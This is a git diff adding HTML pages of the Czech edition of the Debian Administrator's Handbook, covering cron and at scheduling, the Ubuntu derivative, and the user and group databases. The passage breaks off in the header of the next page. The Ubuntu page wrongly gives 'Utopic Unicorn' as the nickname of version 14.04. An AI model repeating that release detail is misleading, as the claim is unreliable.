+					</div></li></ul></div><div
+            class="para">
+				All these details are documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">crontab</span>(5)</span> man page.
+			</div><div
+            class="para">
+				Each value can be expressed in the form of a list of possible values (separated by commas). The syntax <code
+              class="literal">a-b</code> describes the interval of all the values between <code
+              class="literal">a</code> and <code
+              class="literal">b</code>. The syntax <code
+              class="literal">a-b/c</code> describes the interval with an increment of <code
+              class="literal">c</code> (example: <code
+              class="literal">0-10/2</code> means <code
+              class="literal">0,2,4,6,8,10</code>). An asterisk <code
+              class="literal">*</code> is a wildcard, representing all possible values.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.crontab"></a><p
+              class="title"><strong>Příklad 9.2. Sample <code
+                  class="filename">crontab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">#Format
+#min hour day mon dow  command
+
+# Download data every night at 7:25 pm
+ 25  19   *   *   *    $HOME/bin/get.pl
+
+# 8:00 am, on weekdays (Monday through Friday)
+ 00  08   *   *   1-5  $HOME/bin/dosomething
+
+# Restart the IRC proxy after each reboot
+@reboot /usr/bin/dircproxy
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Executing a command on boot</strong></p></div></div></div><div
+              class="para">
+				To execute a command a single time, just after booting the computer, you can use the <code
+                class="literal">@reboot</code> macro (a simple restart of <code
+                class="command">cron</code> does not trigger a command scheduled with <code
+                class="literal">@reboot</code>). This macro replaces the first five fields of an entry in the <span
+                class="emphasis"><em>crontab</em></span>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> Emulating <code
+                        class="command">cron</code> with <code
+                        class="command">systemd</code></strong></p></div></div></div><div
+              class="para">
+				It is possible to emulate part of <code
+                class="command">cron</code>'s behaviour with <code
+                class="command">systemd</code>'s timer mechanism (see <a
+                class="xref"
+                href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.at-command"></a>9.7.2. Using the <code
+                    class="command">at</code> Command</h3></div></div></div><a
+            id="id-1.12.10.16.2"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">at</code> executes a command at a specified moment in the future. It takes the desired time and date as command-line parameters, and the command to be executed in its standard input. The command will be executed as if it had been entered in the current shell. <code
+              class="command">at</code> even takes care to retain the current environment, in order to reproduce the same conditions when it executes the command. The time is indicated by following the usual conventions: <code
+              class="literal">16:12</code> or <code
+              class="literal">4:12pm</code> represents 4:12 pm. The date can be specified in several European and Western formats, including <code
+              class="literal">DD.MM.YY</code> (<code
+              class="literal">27.07.15</code> thus representing 27 July 2015), <code
+              class="literal">YYYY-MM-DD</code> (this same date being expressed as <code
+              class="literal">2015-07-27</code>), <code
+              class="literal">MM/DD/[CC]YY</code> (ie., <code
+              class="literal">12/25/15</code> or <code
+              class="literal">12/25/2015</code> will be December 25, 2015), or simple <code
+              class="literal">MMDD[CC]YY</code> (so that <code
+              class="literal">122515</code> or <code
+              class="literal">12252015</code> will, likewise, represent December 25, 2015). Without it, the command will be executed as soon as the clock reaches the time indicated (the same day, or tomorrow if that time has already passed on the same day). You can also simply write “today” or “tomorrow”, which is self-explanatory.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>at 09:00 27.07.15 &lt;&lt;END</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>echo "Don't forget to wish a Happy Birthday to Raphaël!" \</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>  | mail lolando@debian.org</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>END</code></strong>
+<code
+              class="computeroutput">warning: commands will be executed using /bin/sh
+job 31 at Mon Jul 27 09:00:00 2015</code></pre><div
+            class="para">
+				An alternative syntax postpones the execution for a given duration: <code
+              class="command">at now + <em
+                class="replaceable">number</em> <em
+                class="replaceable">period</em></code>. The <em
+              class="replaceable">period</em> can be <code
+              class="literal">minutes</code>, <code
+              class="literal">hours</code>, <code
+              class="literal">days</code>, or <code
+              class="literal">weeks</code>. The <em
+              class="replaceable">number</em> simply indicates the number of said units that must elapse before execution of the command.
+			</div><div
+            class="para">
+				To cancel a task scheduled by <code
+              class="command">cron</code>, simply run <code
+              class="command">crontab -e</code> and delete the corresponding line in the <span
+              class="emphasis"><em>crontab</em></span> file. For <code
+              class="command">at</code> tasks, it is almost as easy: run <code
+              class="command">atrm <em
+                class="replaceable">task-number</em></code>. The task number is indicated by the <code
+              class="command">at</code> command when you scheduled it, but you can find it again with the <code
+              class="command">atq</code> command, which gives the current list of scheduled tasks.
+			</div><a
+            id="id-1.12.10.16.7"
+            class="indexterm"></a><a
+            id="id-1.12.10.16.8"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.inetd.html"><strong>Předcházející</strong>9.6. The inetd Super-Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Další</strong>9.8. Scheduling Asynchronous Tasks: anacron</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.ubuntu.html b/tmp/cs-CZ/html/sect.ubuntu.html
new file mode 100644
index 000000000..277401335
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.ubuntu.html
@@ -0,0 +1,122 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.2. Ubuntu</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="next"
+        href="sect.linux-mint.html"
+        title="A.3. Linux Mint" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ubuntu.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="derivative-distributions.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.linux-mint.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ubuntu"></a>A.2. Ubuntu</h2></div></div></div><a
+          id="id-1.20.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Ubuntu made quite a splash when it came on the Free Software scene, and for good reason: Canonical Ltd., the company that created this distribution, started by hiring thirty-odd Debian developers and publicly stating the far-reaching objective of providing a distribution for the general public with a new release twice a year. They also committed to maintaining each version for a year and a half.
+		</div><div
+          class="para">
+			These objectives necessarily involve a reduction in scope; Ubuntu focuses on a smaller number of packages than Debian, and relies primarily on the GNOME desktop (although an official Ubuntu derivative, called “Kubuntu”, relies on KDE Plasma). Everything is internationalized and made available in a great many languages.
+		</div><a
+          id="id-1.20.5.5"
+          class="indexterm"></a><div
+          class="para">
+			So far, Ubuntu has managed to keep this release rhythm. They also publish <span
+            class="emphasis"><em>Long Term Support</em></span> (LTS) releases, with a 5-year maintenance promise. As of April 2015, the current LTS version is version 14.04, nicknamed Utopic Unicorn. The last non-LTS version is version 15.04, nicknamed Vivid Vervet. Version numbers describe the release date: 15.04, for example, was released in April 2015.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Ubuntu's support and maintenance promise</strong></p></div></div></div><a
+            id="id-1.20.5.7.2"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.4"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.5"
+            class="indexterm"></a><div
+            class="para">
+			Canonical has adjusted multiple times the rules governing the length of the period during which a given release is maintained. Canonical, as a company, promises to provide security updates to all the software available in the <code
+              class="literal">main</code> and <code
+              class="literal">restricted</code> sections of the Ubuntu archive, for 5 years for LTS releases and for 9 months for non-LTS releases. Everything else (available in the <code
+              class="literal">universe</code> and <code
+              class="literal">multiverse</code>) is maintained on a best-effort basis by volunteers of the MOTU team (<span
+              class="emphasis"><em>Masters Of The Universe</em></span>). Be prepared to handle security support yourself if you rely on packages of the latter sections.
+		</div></div><div
+          class="para">
+			Ubuntu has reached a wide audience in the general public. Millions of users were impressed by its ease of installation, and the work that went into making the desktop simpler to use.
+		</div><div
+          class="para">
+			Ubuntu and Debian used to have a tense relationship; Debian developers who had placed great hopes in Ubuntu contributing directly to Debian were disappointed by the difference between the Canonical marketing, which implied Ubuntu were good citizens in the Free Software world, and the actual practice where they simply made public the changes they applied to Debian packages. Things have been getting better over the years, and Ubuntu has now made it general practice to forward patches to the most appropriate place (although this only applies to external software they package and not to the Ubuntu-specific software such as Mir or Unity). <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.ubuntu.com/">http://www.ubuntu.com/</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="derivative-distributions.html"><strong>Předcházející</strong>Příloha A. Derivative Distributions</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.linux-mint.html"><strong>Další</strong>A.3. Linux Mint</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.user-group-databases.html b/tmp/cs-CZ/html/sect.user-group-databases.html
new file mode 100644
index 000000000..e5b3f17ec
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.user-group-databases.html
@@ -0,0 +1,443 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.4. User and Group Databases</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.hostname-name-service.html"
+        title="8.3. Setting the Hostname and Configuring the Name Service" /><link
+        rel="next"
+        href="sect.creating-accounts.html"
+        title="8.5. Creating Accounts" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.user-group-databases.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hostname-name-service.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.creating-accounts.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.user-group-databases"></a>8.4. User and Group Databases</h2></div></div></div><a
+          id="id-1.11.8.2"
+          class="indexterm"></a><a
+          id="id-1.11.8.3"
+          class="indexterm"></a><a
+          id="id-1.11.8.4"
+          class="indexterm"></a><a
+          id="id-1.11.8.5"
+          class="indexterm"></a><div
+          class="para">
+			The list of users is usually stored in the <code
+            class="filename">/etc/passwd</code> file, while the <code
+            class="filename">/etc/shadow</code> file stores encrypted passwords. Both are text files, in a relatively simple format, which can be read and modified with a text editor. Each user is listed there on a line with several fields separated with a colon (“<code
+            class="literal">:</code>”).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Editing system files</strong></p></div></div></div><div
+            class="para">
+			The system files mentioned in this chapter are all plain text files, and can be edited with a text editor. Considering their importance to core system functionality, it is always a good idea to take extra precautions when editing system files. First, always make a copy or backup of a system file before opening or altering it. Second, on servers or machines where more than one person could potentially access the same file at the same time, take extra steps to guard against file corruption.
+		</div><div
+            class="para">
+			For this purpose, it is enough to use the <code
+              class="command">vipw</code> command to edit the <code
+              class="filename">/etc/passwd</code> file, or <code
+              class="command">vigr</code> to edit <code
+              class="filename">/etc/group</code>. These commands lock the file in question prior to running the text editor, (<code
+              class="command">vi</code> by default, unless the <code
+              class="varname">EDITOR</code> environment variable has been altered). The <code
+              class="literal">-s</code> option in these commands allows editing the corresponding <span
+              class="foreignphrase"><em
+                class="foreignphrase">shadow</em></span> file.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Crypt, a one-way function</strong></p></div></div></div><a
+            id="id-1.11.8.8.2"
+            class="indexterm"></a><div
+            class="para">
+			<code
+              class="command">crypt</code> is a one-way function that transforms a string (<code
+              class="varname">A</code>) into another string (<code
+              class="varname">B</code>) in a way that <code
+              class="varname">A</code> cannot be derived from <code
+              class="varname">B</code>. The only way to identify <code
+              class="varname">A</code> is to test all possible values, checking each one to determine if transformation by the function will produce <code
+              class="varname">B</code> or not. It uses up to 8 characters as input (string <code
+              class="varname">A</code>) and generates a string of 13, printable, ASCII characters (string <code
+              class="varname">B</code>).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-passwd"></a>8.4.1. User List: <code
+                    class="filename">/etc/passwd</code></h3></div></div></div><div
+            class="para">
+				Here is the list of fields in the <code
+              class="filename">/etc/passwd</code> file:
+			</div><a
+            id="id-1.11.8.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.4"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.5"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.6"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.7"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.8"
+            class="indexterm"></a><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						login, for example <code
+                    class="literal">rhertzog</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						password: this is a password encrypted by a one-way function (<code
+                    class="command">crypt</code>), relying on <code
+                    class="literal">DES</code>, <code
+                    class="literal">MD5</code>, <code
+                    class="literal">SHA-256</code> or <code
+                    class="literal">SHA-512</code>. The special value “<code
+                    class="literal">x</code>” indicates that the encrypted password is stored in <code
+                    class="filename">/etc/shadow</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">uid</code>: unique number identifying each user;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">gid</code>: unique number for the user's main group (Debian creates a specific group for each user by default);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">GECOS</code>: data field usually containing the user's full name;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						login directory, assigned to the user for storage of their personal files (the environment variable <code
+                    class="varname">$HOME</code> generally points here);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						program to execute upon login. This is usually a command interpreter (shell), giving the user free rein. If you specify <code
+                    class="command">/bin/false</code> (which does nothing and returns control immediately), the user cannot login.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Unix group</strong></p></div></div></div><a
+              id="id-1.11.8.9.10.2"
+              class="indexterm"></a><div
+              class="para">
+				A Unix group is an entity including several users so that they can easily share files using the integrated permission system (by benefiting from the same rights). You can also restrict use of certain programs to a specific group.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-shadow"></a>8.4.2. The Hidden and Encrypted Password File: <code
+                    class="filename">/etc/shadow</code></h3></div></div></div><a
+            id="id-1.11.8.10.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.10.3"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="filename">/etc/shadow</code> file contains the following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						login;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						encrypted password;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						several fields managing password expiration.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="filename">/etc/passwd</code>, <code
+                        class="filename">/etc/shadow</code> and <code
+                        class="filename">/etc/group</code> file formats</strong></p></div></div></div><div
+              class="para">
+				These formats are documented in the following man pages: <span
+                class="citerefentry"><span
+                  class="refentrytitle">passwd</span>(5)</span>, <span
+                class="citerefentry"><span
+                  class="refentrytitle">shadow</span>(5)</span>, and <span
+                class="citerefentry"><span
+                  class="refentrytitle">group</span>(5)</span>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> <code
+                        class="filename">/etc/shadow</code> file security</strong></p></div></div></div><div
+              class="para">
+				<code
+                class="filename">/etc/shadow</code>, unlike its alter-ego, <code
+                class="filename">/etc/passwd</code>, cannot be read by regular users. Any encrypted password stored in <code
+                class="filename">/etc/passwd</code> is readable by anybody; a cracker could try to “break” (or reveal) a password by one of several “brute force” methods which, simply put, guess at commonly used combinations of characters. This attack — called a "dictionary attack" — is no longer possible on systems using <code
+                class="filename">/etc/shadow</code>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.account-modification"></a>8.4.3. Modifying an Existing Account or Password</h3></div></div></div><a
+            id="id-1.11.8.11.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.3"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.4"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.5"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.6"
+            class="indexterm"></a><div
+            class="para">
+				The following commands allow modification of the information stored in specific fields of the user databases: <code
+              class="command">passwd</code> permits a regular user to change their password, which in turn, updates the <code
+              class="filename">/etc/shadow</code> file; <code
+              class="command">chfn</code> (CHange Full Name), reserved for the super-user (root), modifies the <code
+              class="literal">GECOS</code> field. <code
+              class="command">chsh</code> (CHange SHell) allows the user to change their login shell, however available choices will be limited to those listed in <code
+              class="filename">/etc/shells</code>; the administrator, on the other hand, is not bound by this restriction and can set the shell to any program of their choosing.
+			</div><div
+            class="para">
+				Finally, the <code
+              class="command">chage</code> (CHange AGE) command allows the administrator to change the password expiration settings (the <code
+              class="literal">-l <em
+                class="replaceable">user</em></code> option will list the current settings). You can also force the expiration of a password using the <code
+              class="command">passwd -e <em
+                class="replaceable">user</em></code> command, which will require the user to change their password the next time they log in.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.disabling-account"></a>8.4.4. Disabling an Account</h3></div></div></div><a
+            id="id-1.11.8.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.12.3"
+            class="indexterm"></a><div
+            class="para">
+				You may find yourself needing to “disable an account” (lock out a user), as a disciplinary measure, for the purposes of an investigation, or simply in the event of a prolonged or definitive absence of a user. A disabled account means the user cannot login or gain access to the machine. The account remains intact on the machine and no files or data are deleted; it is simply inaccessible. This is accomplished by using the command <code
+              class="command">passwd -l <em
+                class="replaceable">user</em></code> (lock). Re-enabling the account is done in similar fashion, with the <code
+              class="literal">-u</code> option (unlock).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.intro-nss"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> NSS and system databases</strong></p></div></div></div><a
+              id="id-1.11.8.12.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.8.12.5.3"
+              class="indexterm"></a><div
+              class="para">
+				Instead of using the usual files to manage lists of users and groups, you could use other types of databases, such as LDAP or <code
+                class="command">db</code>, by using an appropriate NSS (Name Service Switch) module. The modules used are listed in the <code
+                class="filename">/etc/nsswitch.conf</code> file, under the <code
+                class="literal">passwd</code>, <code
+                class="literal">shadow</code> and <code
+                class="literal">group</code> entries. See <a
+                class="xref"
+                href="sect.ldap-directory.html#sect.config-nss">11.7.3.1 – „Configuring NSS“</a> for a specific example of the use of an NSS module by LDAP.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-group"></a>8.4.5. Group List: <code
+                    class="filename">/etc/group</code></h3></div></div></div><div
+            class="para">
+				Groups are listed in the <code
+              class="filename">/etc/group</code> file, a simple textual database in a format similar to that of the <code
+              class="filename">/etc/passwd</code> file, with the following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						group name;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						password (optional): This is only used to join a group when one is not a usual member (with the <code
+                    class="command">newgrp</code> or <code
+                    class="command">sg</code> commands, see sidebar <a
+                    class="xref"
+                    href="sect.user-group-databases.html#sidebar.working-with-several-groups"><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Working with several groups</a>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">gid</code>: unique group identification number;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						list of members: list of names of users who are members of the group, separated by commas.
+					</div></li></ul></div><div
+            class="para">
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.working-with-several-groups"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Working with several groups</strong></p></div></div></div><a
+              id="id-1.11.8.13.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.3"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.4"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.5"
+              class="indexterm"></a><div
+              class="para">
+				Each user may be a member of many groups; one of them is their “main group”. A user's main group is, by default, created during initial user configuration. By default, each file that a user creates belongs to them, as well as to their main group. This is not always desirable; for example, when the user needs to work in a directory shared by a group other than their main group. In this case, the user needs to change their main group using one of the following commands: <code
+                class="command">newgrp</code>, which starts a new shell, or <code
+                class="command">sg</code>, which simply executes a command using the supplied alternate group. These commands also allow the user to join a group to which they do not belong. If the group is password protected, they will need to supply the appropriate password before the command is executed.
+			</div><div
+              class="para">
+				Alternatively, the user can set the <code
+                class="literal">setgid</code> bit on the directory, which causes files created in that directory to automatically belong to the correct group. For more details, see sidebar <a
+                class="xref"
+                href="sect.rights-management.html#sidebar.setgid-dir"><span
+                  class="emphasis"><em>SECURITY</em></span> <code
+                  class="literal">setgid</code> directory and <span
+                  class="emphasis"><em>sticky bit</em></span></a>.
+			</div><div
+              class="para">
+				The <code
+                class="command">id</code> command displays the current state of a user, with their personal identifier (<code
+                class="varname">uid</code> variable), current main group (<code
+                class="varname">gid</code> variable), and the list of groups to which they belong (<code
+                class="varname">groups</code> variable).
+			</div></div><a
+            id="id-1.11.8.13.6"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.7"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">addgroup</code> and <code
+              class="command">delgroup</code> commands add or delete a group, respectively. The <code
+              class="command">groupmod</code> command modifies a group's information (its <code
+              class="literal">gid</code> or identifier). The command <code
+              class="command">gpasswd <em
+                class="replaceable">group</em></code> changes the password for the group, while the <code
+              class="command">gpasswd -r <em
+                class="replaceable">group</em></code> command deletes it.
+			</div><a
+            id="id-1.11.8.13.9"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.10"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.11"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.12"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.13"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.14"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.15"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.16"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">getent</code></strong></p></div></div></div><a
+              id="id-1.11.8.13.17.2"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="command">getent</code> (get entries) command checks the system databases the standard way, using the appropriate library functions, which in turn call the NSS modules configured in the <code
+                class="filename">/etc/nsswitch.conf</code> file. The command takes one or two arguments: the name of the database to check, and a possible search key. Thus, the command <code
+                class="command">getent passwd rhertzog</code> will give the information from the user database regarding the user <code
+                class="literal">rhertzog</code>.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hostname-name-service.html"><strong>Předcházející</strong>8.3. Setting the Hostname and Configuring the Nam...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.creating-accounts.html"><strong>Další</strong>8.5. Creating Accounts</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.user-space.html b/tmp/cs-CZ/html/sect.user-space.html
new file mode 100644
index 000000000..e0abb1fc2
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.user-space.html
@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.5. The User Space</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.kernel-role-and-tasks.html"
+        title="B.4. Some Tasks Handled by the Kernel" /><link
+        rel="next"
